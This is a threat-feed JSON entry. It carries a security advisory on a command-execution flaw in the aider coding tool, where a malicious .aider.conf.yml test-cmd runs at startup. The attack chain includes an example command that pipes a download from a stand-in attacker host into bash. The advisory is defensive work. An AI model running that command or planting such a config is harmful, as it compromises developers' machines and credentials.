{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","favicon":"https://feed.craftedsignal.io/favicon-32x32.png","feed_url":"https://feed.craftedsignal.io/products/aider--0.86.3.dev/feed.json","home_page_url":"https://feed.craftedsignal.io/","icon":"https://feed.craftedsignal.io/apple-touch-icon.png","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:a:aider:aider:*:*:*:*:*:*:*:*"],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-85674"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["aider (\u003c= 0.86.3.dev)"],"_cs_severities":["high"],"_cs_tags":["vulnerability","remote-code-execution","aider","cli-tool"],"_cs_type":"advisory","_cs_vendors":["Aider"],"content_html":"\u003cp\u003eAider (aider-chat), a popular AI-assisted command-line interface, contains a critical security flaw identified as CVE-2026-85674. The vulnerability arises because the tool automatically discovers and parses a .aider.conf.yml configuration file from the root of the active Git repository. If an attacker controls the repository, they can define 'test-cmd' or 'lint-cmd' configuration parameters. Aider executes these commands via a subprocess with shell=True at startup or upon the first file edit. This process requires no LLM interaction, API key validation, or user confirmation, leading to immediate arbitrary command execution on the victim's host machine. The issue has been confirmed in version 0.86.3.dev and earlier versions. This represents a significant risk for developers who clone and interact with untrusted repositories using the aider tool.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker creates a malicious Git repository containing a crafted .aider.conf.yml file.\u003c/li\u003e\n\u003cli\u003eAttacker sets the 'test-cmd' parameter in the YAML file to a malicious command (e.g., 'curl -s \u003ca href=\"http://attacker.com/payload\"\u003ehttp://attacker.com/payload\u003c/a\u003e | bash').\u003c/li\u003e\n\u003cli\u003eAttacker pushes the repository to a public platform or distributes the repository archive to a target developer.\u003c/li\u003e\n\u003cli\u003eVictim clones the malicious repository to their local machine.\u003c/li\u003e\n\u003cli\u003eVictim navigates to the repository root and executes the 'aider' command.\u003c/li\u003e\n\u003cli\u003eAider automatically identifies the .aider.conf.yml file in the current directory and reads the 'test-cmd' parameter.\u003c/li\u003e\n\u003cli\u003eAider invokes a shell process ('/bin/sh -c' or 'cmd.exe /c') to execute the malicious 'test-cmd' string.\u003c/li\u003e\n\u003cli\u003eAttacker-supplied code executes with the privileges of the local user, leading to host compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation results in arbitrary command execution on the host machine. Given that developers frequently clone repositories to inspect code, this vulnerability allows attackers to target the development environment directly, potentially leading to credential theft, source code exfiltration, or lateral movement within the victim's network. All users of aider versions 0.86.3.dev and earlier are affected across Windows, Linux, and macOS environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cp\u003ePrioritize the following actions to mitigate the risk associated with CVE-2026-85674:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eInstruct developers to cease usage of 'aider' within untrusted or newly cloned repositories until the software is patched.\u003c/li\u003e\n\u003cli\u003eImplement strict code-review practices for any .aider.conf.yml files found in repositories before interacting with them using the 'aider' tool.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule below to detect subprocess execution initiated by the aider binary.\u003c/li\u003e\n\u003cli\u003eMonitor for unusual process lineage where 'aider' or 'aider-chat' spawns shell interpreters (cmd.exe, powershell.exe, bash, sh).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-09-04T15:31:07Z","date_published":"2026-09-04T15:31:07Z","id":"https://feed.craftedsignal.io/briefs/2026-09-aider-arbitrary-command-execution/","summary":"The aider CLI tool is vulnerable to arbitrary command execution because it automatically executes shell commands defined in a .aider.conf.yml file located in the root of a Git repository upon startup.","title":"Arbitrary Command Execution in aider via Malicious Configuration Files","url":"https://feed.craftedsignal.io/briefs/2026-09-aider-arbitrary-command-execution/"}],"language":"en","title":"CraftedSignal Threat Feed - Aider (\u003c= 0.86.3.dev)","version":"https://jsonfeed.org/version/1.1"}